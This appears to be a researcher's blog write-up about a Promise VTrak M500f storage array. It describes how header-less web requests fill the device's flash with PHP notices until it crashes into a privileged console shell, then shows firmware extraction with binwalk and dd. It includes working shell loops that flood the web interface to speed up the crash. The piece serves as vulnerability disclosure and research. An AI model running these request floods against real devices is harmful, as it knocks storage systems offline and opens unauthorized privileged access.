Promise VTrak M500f
Exploit
I'm using a Promise VTrak M500f storage array at work, and every couple of weeks it crashes. Updating to the latest firmware didn't help much.
It always starts with the device's webserver becoming unresponsive, and not much later the whole device just breaks down.
Usually, when I notice that the device starts to act up again, I just reboot it and it's fine for the next couple of weeks.
To do this, I log in on the serial console and run:
administrator@cli> shutdown -a restart
So the last time this happened, I noticed something was different with the CLI over the serial console... it was... way more interesting!
Oh, exploitable!
Here's one of the problem sources: in lines 23 and 24 of /islavista/sw/php/promise/language.php, which is included in the code that's executed when you access the device's WebPAM PROe webinterface, PHP is told to read the user's preferred language from the Accept-Language header that the browser sends on each request.
No problem there: your browser provides this header, so you'll probably never see an error from this code.
But if you're using a monitoring tool like Nagios to check whether the webinterface is still alive, that check doesn't send the header, and PHP throws an error of the level E_NOTICE.
$ php -a
Interactive mode enabled

<?php
preg_match('/^([a-z\-]+)/i', $_SERVER['HTTP_ACCEPT_LANGUAGE'], $matches);
$lang=$matches[1];
switch(substr($lang,0,2)) {
    case 'en': $language='en_US'; break;
    // [...]
    default:   $language='en_US'; break;
}
?>
PHP Notice: Undefined index: HTTP_ACCEPT_LANGUAGE in - on line 2
PHP Notice: Undefined offset: 1 in - on line 3
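You can trigger the same notices by hand: any request without an Accept-Language header will do. A minimal sketch (192.168.0.2 is the device IP used in the scripts further down; curl doesn't send that header unless told to):

$ # a single header-less request already produces the two notices above in the device's log
$ curl -s -o /dev/null "http://192.168.0.2/"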
Of course, being the good developer that you are, you hide those errors from the user, should they ever arise at all, and only write them to a logfile somewhere on the device's internal flash.
[08-Jul-2011 19:52:24] PHP Notice: Undefined index: HTTP_ACCEPT_LANGUAGE in /islavista/sw/php/promise/language.php on line 23
[08-Jul-2011 19:52:24] PHP Notice: Undefined offset: 1 in /islavista/sw/php/promise/language.php on line 24
[08-Jul-2011 19:52:26] PHP Notice: Undefined index: HTTP_HOST in /islavista/sw/php/promise/index.php on line 182
Being a bit unsure yourself of how good a developer you really are, you tell PHP in its config file /islavista/conf/sw/php.ini to log not only real errors of the levels E_WARNING or E_ERROR, or what the healthy default recommends, "E_ALL & ~E_NOTICE" (everything except E_NOTICE)... no, you want them all, so you can write impeccable code!
Have you ever wondered why it's called the "default" setting? The De-Fault setting? Also known as the "Please don't break anything!" setting? You'll find out soon.
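To make the difference concrete, here's a minimal sketch you can run on any box with a PHP 5 era CLI (not the device; newer PHP versions reclassify undefined-index accesses, so the exact message differs there):

$ # with the "healthy default", the notice is suppressed and nothing shows up
$ php -d display_errors=1 -r 'error_reporting(E_ALL & ~E_NOTICE); $a = array(); echo $a["missing"];'
$ # with E_ALL, the very same code complains on every run, e.g.:
$ # PHP Notice:  Undefined index: missing in Command line code on line 1
$ php -d display_errors=1 -r 'error_reporting(E_ALL); $a = array(); echo $a["missing"];'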
So, your Nagios checks the webserver every 5 minutes, every hour of the day, every day of the week, etc., and every time a couple of lines are appended to the logfile, because you want to be in control and see each and every issue in your code.
Now what would you think will happen if that logfile gets so big that there is no space left on that flash?
I can tell you what will happen:
islavista> _
When I told Promise about the issue, one of their support engineers had only this to say:
"I just can repeat [to] you one more time, you should not even know the word 'islavista' related to this device."
Okay, that was a lie, it wasn't the only thing he said. He added:
"You need a new controller."
O RLY? I don't think that replacing my hardware will fix an issue in your firmware.
(Speaking of which, I'm still unsure whether I should publish the whole conversation from their ticketing system; that would be pretty embarrassing for them... they tried to convince me that my hardware is faulty and needs to be replaced. Yeah, right.)
Privilege Escalation
The 3 lines per request amount to 354 bytes of text, and my storage crashed when the logfile was roughly 3.5 MB in size, so in theory ~10,000 requests are all that's needed for this exploit to work its magic.
Nagios checks every 5 minutes, that's 288 requests per day, which means that after ~35 days the log should have filled all available space.
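A quick sanity check of those numbers in the shell (a sketch; the integer division rounds down, so it lands slightly below the estimates above):

$ echo $(( 3500000 / 354 ))   # requests needed to fill ~3.5 MB of log space
9887
$ echo $(( 9887 / 288 ))      # days until then, at one check every 5 minutes
34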
Can we speed this up? Yes, we can. A wget request to the webinterface takes me an average of 6 seconds, so with the following simple script I can get ~14,400 requests per day, which means it takes ~17 hours to fill all available space.
$ while true; do wget -O /dev/null "http://192.168.0.2"; done
Check the webinterface from time to time; when you see a PHP error saying it couldn't write its session because /tmp is full, you're golden! Fire up your serial console and enjoy.
You can automate this, too:
$ while true; do if lynx --dump "http://192.168.0.2/" | grep -q "tmp"; then echo "EOF" | mail -s 'Exploit ready!' you@example.com; break; fi; done
Remote Privilege Escalation, too?
Still unconfirmed, but in theory this should also work over Telnet instead of the serial console, provided that Telnet is enabled on the device.
Firmware
Getting Started
Download the most recent firmware (v2.39 at the time of this writing), and also make sure you have binwalk installed, an incredibly helpful tool when analyzing firmware files (a quick fetch-and-unpack sketch follows the links):
- Download Page: http://firstweb.promise.com/support/download/download2_eng.asp?productID=153&category=all&os=100
- Firmware: http://firstweb.promise.com/upload/Support/Firmware/Mx00_series_v2.39.0000.00_with_notes.zip
- binwalk: http://code.google.com/p/binwalk/
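As a quick fetch-and-unpack sketch (the image name is the one analyzed below; that it sits at the top level of the zip is an assumption):

$ wget "http://firstweb.promise.com/upload/Support/Firmware/Mx00_series_v2.39.0000.00_with_notes.zip"
$ unzip Mx00_series_v2.39.0000.00_with_notes.zip
$ # all offsets in this article refer to this image
$ file iv2p_all_20110303_16mb.img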
Analyzing the Firmware file
Use binwalk to look for the addresses of files within the firmware file:
$ binwalk -v iv2p_all_20110303_16mb.img
This gives you a nice table with the decimal offset of each file in the firmware, and also the most likely format of each file:
Scan Time:    Aug 03, 2011 @ 20:13:21
Magic File:   /etc/binwalk/magic.binwalk
Signatures:   67
Target File:  iv2p_all_20110303_16mb.img
MD5 Checksum: b8dad677c907a53ca9b222f2103c13b3

DECIMAL         HEX             DESCRIPTION
-------------------------------------------------------------------------------------------------------
18204           0x471C          gzip compressed data, from Unix, last modified: Thu Apr 20 05:12:30 2006, max compression
871968          0xD4E20         Linux Compressed ROM filesystem data, little endian size 2584576 version #2 sorted_dirs, CRC 0xeeb623f0, edition 0, 1217 blocks, 7 files
3456544         0x34BE20        Linux Compressed ROM filesystem data, little endian size 3231744 version #2 sorted_dirs, CRC 0xf1e0771a, edition 0, 2870 blocks, 946 files
3528967         0x35D907        bzip2 compressed data
6688288         0x660E20        gzip compressed data, from Unix, last modified: Thu Mar 3 03:51:40 2011, max compression
11309493        0xAC91B5        Linux Compressed ROM filesystem data, little endian size 1277952 version #2 sorted_dirs, CRC 0x477edaab, edition 0, 802 blocks, 142 files
12882033        0xC49071        LZMA compressed data, properties: 0x5D, dictionary size: 335544320 bytes, uncompressed size: 30 bytes
13215338        0xC9A66A        LZMA compressed data, properties: 0x85, dictionary size: 740294656 bytes, uncompressed size: 16388 bytes
13216042        0xC9A92A        LZMA compressed data, properties: 0x86, dictionary size: 745537536 bytes, uncompressed size: 16388 bytes
13216734        0xC9ABDE        LZMA compressed data, properties: 0x89, dictionary size: 747110400 bytes, uncompressed size: 16388 bytes
13219257        0xC9B5B9        LZMA compressed data, properties: 0x5D, dictionary size: 335544320 bytes, uncompressed size: 30 bytes
13220658        0xC9BB32        LZMA compressed data, properties: 0x95, dictionary size: 272629760 bytes, uncompressed size: 16387 bytes
13221334        0xC9BDD6        LZMA compressed data, properties: 0x90, dictionary size: 65536 bytes, uncompressed size: 65536 bytes
13221354        0xC9BDEA        LZMA compressed data, properties: 0x90, dictionary size: 65536 bytes, uncompressed size: 65536 bytes
Extracting the Firmware parts
The principle is pretty simple: use dd to read a segment from the firmware (if=), using a blocksize (bs=) of 1, starting (skip=) at the decimal offset of the file you want, with a length (count=) of "the next file's offset minus this file's offset", and write it to an output file (of=). It makes things a lot easier if you give the output file the extension of the filetype that binwalk reports.
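If you have to carve out more than one segment, a tiny helper makes this less error-prone. A minimal sketch (carve is a made-up name; the offsets still come straight from the binwalk table above):

$ # carve START NEXT OUTFILE - cut the segment [START, NEXT) out of the firmware image
$ carve() { dd if=iv2p_all_20110303_16mb.img bs=1 skip="$1" count=$(( $2 - $1 )) of="$3"; }
$ carve 18204 871968 part1.gz    # equivalent to the Part 1 command below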
Part 1
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=18204 count=853764 of=part1.gz
$ gunzip part1.gz
$ file part1
part1: data
Probably the kernel and initrd?
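One cheap way to test that guess (a sketch; an uncompressed kernel usually carries its version banner as a plain string, and if nothing turns up, the binwalk pass over part1 in "The Missing Link" below digs deeper):

$ strings part1 | grep -i 'linux version'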
Part 2
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=871968 count=2584576 of=part2.cramfs
$ mkdir part2
$ mount -o loop part2.cramfs part2/
$ ls -l part2/
total 4858
-rw-r--r-- 1 root root   18204 Jan  1  1970 iodrv.o
-rw-r--r-- 1 root root  233655 Jan  1  1970 Marvell.o
-rw-r--r-- 1 root root  470713 Jan  1  1970 qla4xxx.o
-rw-r--r-- 1 root root 3193368 Jan  1  1970 raid_core.o
-rw-r--r-- 1 root root  436560 Jan  1  1970 scsi.o
-rw-r--r-- 1 root root  619697 Jan  1  1970 xfc.o
Kernel modules, boooring!
Part 3
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=3456544 count=72423 of=part3.cramfs
$ mkdir part3/
$ mount -o loop part3.cramfs part3/
$ ls -lR part3/
The webinterface and some non-standard binaries, so this must be their own code.
When accessing a file you'll get an error, though. Quick check:
$ fsck.cramfs part3.cramfs
fsck.cramfs: file length too short
Damn.
Part 4
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=3528967 count=3159321 of=part4.bz2
$ bunzip2 part4.bz2
bunzip2: part4.bz2 is not a bzip2 file.
Hmm, strange.
Part 5
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=6688288 count=4621205 of=part5.gz
$ gunzip part5.gz
$ file part5
part5: Linux rev 1.0 ext2 filesystem data, UUID=1e4f9d2b-b406-4a38-bbf8-8f1fcf52e5c7
So it's a gzip, but that contains an ext2 partition.
$ mv part5 part5.ext2
$ mkdir part5
$ mount -o loop part5.ext2 part5/
$ ls -lR part5/
BusyBox, libraries, you name it. This must be the base Linux part.
Part 6
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=11309493 count=1572540 of=part6.cramfs
$ mkdir part6/
$ mount -o loop part6.cramfs part6/
$ ls -lR part6/
fw and sw, this is probably the interesting stuff? But where's the /islavista/conf/sw/php.ini?
Fixing Part 3
Part 3 is a broken CramFS, and Part 4 is a bzip2 file that is not a bzip2 file... smells fishy. The binwalk table above says the CramFS at offset 3456544 is 3231744 bytes long, which runs right past the "bzip2" signature, so that signature is most likely a false positive inside the filesystem. Let's say Part 3 is actually Part 3.1 and Part 4 is Part 3.2, and extract the full size:
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=3456544 count=3231744 of=part3.cramfs
$ fsck.cramfs -v part3.cramfs
cramfs endianness is little
part3.cramfs: OK
Bingo!
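Now the image mounts cleanly, and you can go looking for the PHP code from the exploit section. A sketch (whether language.php lives in this image or in Part 6 is an assumption, hence the find across both):

$ umount part3/ 2>/dev/null
$ mount -o loop part3.cramfs part3/
$ # locate the language detection code from the exploit section
$ find part3/ part6/ -name 'language.php'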
The Missing Link
There are a lot of strings throughout the firmware that point at 4 MTD blocks which get mounted into the /islavista/conf, /islavista/fw, /islavista/sw and /oem directories.
Finding the contents of those blocks, i.e. what actually gets written to the flash, is the interesting part...
/dev/mtdblock5  /islavista/fw    cramfs  suid,dev,exec,auto,nouser,async,ro
/dev/mtdblock6  /islavista/sw    cramfs  suid,dev,exec,auto,nouser,async,ro
/dev/mtdblock2  /islavista/conf  jffs2   defaults
/dev/mtdblock7  /oem             cramfs  suid,dev,exec,auto,nouser,async,ro
The directory /islavista/flash seems to be the upload destination for firmware updates via the webinterface. The filesystem in Part 6 gets mounted to /oem.
So where do the juicy bits come from? Let's binwalk part1:
$ binwalk -av -x MIPSE part1
We're still looking for 2 CramFS and 1 JFFS2...
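While the hunt for those images goes on, it's easy to double-check that the php.ini really isn't hiding in any of the parts extracted so far. A sketch (run from the directory holding the mounted parts):

$ # look for php.ini, or anything configuring error_reporting, in every extracted filesystem
$ find part2/ part3/ part5/ part6/ -name 'php.ini'
$ grep -rl 'error_reporting' part2/ part3/ part5/ part6/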
Todo
- Find the page that will throw the most errors, to speed up filling the flash.
- Privilege Escalation is already nice, how about Remote Privilege Escalation? Confirm that this also works over Telnet, not only the serial console!
- Where's that php.ini hidden in the firmware? It can't be found in any of the firmware parts yet; maybe it's generated at runtime? Hmm, hmm, hmm.
- Analyze the firmware of different models/series. Code recycling FTW!
Thanks
- Mathis Schmieder for the fsck.cramfs tip; I was a bit lost when I discovered the errors in Part 3
- Joris from Promise Technology, he was the one who eventually understood what I was trying to tell them all the time
EOF